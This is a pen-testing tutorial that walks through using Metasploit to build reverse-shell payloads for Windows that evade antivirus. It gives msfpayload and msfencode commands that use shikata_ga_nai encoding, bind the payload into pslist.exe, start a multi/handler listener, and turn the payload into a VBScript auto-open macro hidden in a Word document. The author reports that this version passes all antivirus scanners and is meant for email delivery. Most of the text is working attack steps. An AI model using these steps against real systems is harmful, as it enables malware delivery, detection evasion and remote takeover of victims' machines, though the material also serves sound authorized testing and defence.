Tools Attack Techniques Lead image: © Ozphoto,
© Ozphoto,

Hiding a malicious file from virus scanners

Pen Tests

The best way to stop an attack is to think like an attacker. We'll show you how to use the Metasploit framework to create a malicious payload that escapes antivirus detection.. By David J. Dodd

A penetration tester simulates an attack on a customer's network by trying to find a way inside. Many such attacks begin with the use of a scanning tool, such as Nexpose, Nessus, or Nmap, to look for network vulnerabilities; however, several of the leading intrusion detection and protection systems are capable of alerting the network owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a payload to the victim that will allow the attacker to establish a foothold on the victim's network. The Metasploit framework includes several binary payloads you can use to open an attack by email – if you can slip past the virus scanners.

Metasploit Antivirus Bypass

A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.

The Metasploit [1] penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would attack it. Metasploit's msfpayload option lets you create a standalone binary to serve as a malicious payload, and the msfencode option encodes the binary to confuse the antivirus scanners. Msfpayload allows you to generate shell code, executables and more. To see a list of options, use msfpayload -h at the command line, and to see a list of available shell code that you can customize for your specific attack, use msfpayload -l. To see a list of options for msfencode, use msfencode -h at the command line. To view which encoders are available, run the msfencode -l command.

Before I encode the payload to bypass antivirus detection, I need to create a standalone binary with msfpayload, which creates a binary that launches a simple reverse shell, allowing a remote user to connect to the victim's machine. If the target is a Windows box, I can narrow down the list of available payloads with the

msfpayload -l | grep windows

command, which gives a list of payloads that are specific to Windows operating systems (see Figure 1). I'll start by trying the Windows meterpreter reverse_tcp payload.

Output from msfpayload -l | grep windows.
Figure 1: Output from msfpayload -l | grep windows.

This payload will connect back to the attacker, injecting the meterpreter server DLL via the Reflective Dll Injection payload (highlight in Figure 1). The O (capital "oh") command-line argument shows all the available configurable options (see Figure 2).

Using the O command-line argument to view configurable options.
Figure 2: Using the O command-line argument to view configurable options.

To create the payload, I use the following command:

# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X /root/Desktop/evi1.exe

All that's left now is to deliver the executable to the victim, which requires some skill in itself. To perceive the victim running the executable, I need a listener running on the attack machine:

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost= lport=4444 E

This command will open a listener on the local machine over port 4444. Once the victim runs the executable, it will open a meterpreter shell on the victim's Windows box (Figure 3).

Msfcli multi/handler options (above) and executing the listener (below).
Figure 3: Msfcli multi/handler options (above) and executing the listener (below).

Once the payload is working, the next step is to find a way to avoid antivirus detection. The Virus Total website runs virus scans on file content and reports which scanners will detect the file. I'll use Virus Total to check the results from the previous example and see how many antivirus vendors hit on the exploit. As you can see in Figure 4, many vendors have uncovered the file.

Twenty-seven hits by antivirus vendors.
Figure 4: Twenty-seven hits by antivirus vendors.

In the hope of achieving a better result, I'll bring in msfencode to try to get past the antivirus vendors. In this case, I'll pipe the raw output of msfpayload as input to msfencode using the shikata ga nai encoder (a name that translates to "nothing can be done" in Japanese).

The encoder will output a Windows binary:

# msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe

The results still show several hits with antivirus scanners, so I'll take another approach. Some antivirus vendors work on signature-based technology, and the payload shell_reverse_tcp shows up right away, so I'll try using the alternative windows/shell/reverse_tcp payload instead of windows/shell_reverse_tcp:

# msfpayload windows/shell/reverse_tcp LHOST= LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10

Also, I will try some additional steps to hide the payload.

This time, I'll take an executable from the sysinternals site called pslist.exe and encode it 10 times with shikata_ga_nai. The payload is combined with the sysinternal tool pslist.exe and renamed pslist2.exe. Unfortunately (for the attacker), the score at Virus Total improves only slightly (see Figure 5). Several common scanners did not identify the exploit. To set up a listener, you can use the msfcli command. If the payload slips through, it will open a shell on my Linux box with admin privileges on the Windows system.

Additional steps hide the payload from some scanners, although several others identify it.
Figure 5: Additional steps hide the payload from some scanners, although several others identify it.

VBScript Infection

As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific exploit, in general, virus scanners are very proficient at stripping out dangerous executables. Another way to deliver a dangerous payload is with a Word document. Word documents are commonly sent by email and opened by many people. A Word doc is a great attack vector. Metasploit has some built-in methods for infecting Word documents with malicious Metasploit payloads.

To begin, create a VBScript payload:

# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe

Now you need to convert this executable to a VBScript with the use of a script found in the Tools section of Metasploit.

Next, just copy the evi1payload.exe to the Tools folder as shown in the following example:

# cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools

Inside the Tools folder is a script called exe2vba.rb. To convert the .exe to a .vbs, issue the following command:

# ruby exe2vba.rb evilpayload.exe evi1_payload.vbs

Next, copy evil_payload.vbs to a Windows machine that has Microsoft Word installed. Open evil_payload.vbs with Notepad and then open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools | Macros | Visual Basic Editor, or go to View Macros if you are using Microsoft Word 2010. Next, copy the first portion of evil_payload.vbs – from Sub Auto_Open() to End Sub – and paste it into the Visual Basic Editor in either Microsoft Word 2003 or 2007 (see Figure 6).

First portion of evi1_payload.vbs in Visual Basic Editor.
Figure 6: First portion of evi1_payload.vbs in Visual Basic Editor.

The next step is to copy the portion from PAYLOAD DATA to the end into the body of the Word document. To verify that this Word document can get past antivirus vendors, upload it to Virus Total http://2 and see if it catches anything (Figure 7). As you can see, the Word doc slips past all the antivirus vendors. (See the Results column on the right side of Figure 7.) The only hard part will be getting the victim to open the document.

Virus Total comes back with no hits.
Figure 7: Virus Total comes back with no hits.

Once you have delivered the Word document to your intended victim, make sure you have the Metasploit client listener up and running on the attack machine.